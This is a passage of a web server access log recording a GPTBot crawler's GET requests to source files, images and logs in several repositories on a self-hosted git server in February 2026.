"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" +[17/Feb/2026:14:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32540] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" +[17/Feb/2026:14:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 26054] [Gzip 10.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10008] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" +[17/Feb/2026:14:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 14070] [Gzip 6.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13086] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" +[17/Feb/2026:14:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" +[17/Feb/2026:14:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11672] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12173] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:14:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12202] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:14:07:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:14:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/" +[17/Feb/2026:14:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" +[17/Feb/2026:14:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" +[17/Feb/2026:14:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" +[17/Feb/2026:14:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10842] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" +[17/Feb/2026:14:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12866] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 242891] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:14:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:14:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11717] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11748] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692345] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429930] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508435] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498800] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" +[17/Feb/2026:14:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" +[17/Feb/2026:14:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:14:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" +[17/Feb/2026:14:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" +[17/Feb/2026:14:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13328] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:14:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" +[17/Feb/2026:14:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" +[17/Feb/2026:14:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" +[17/Feb/2026:14:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" +[17/Feb/2026:14:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641759] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699385] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr 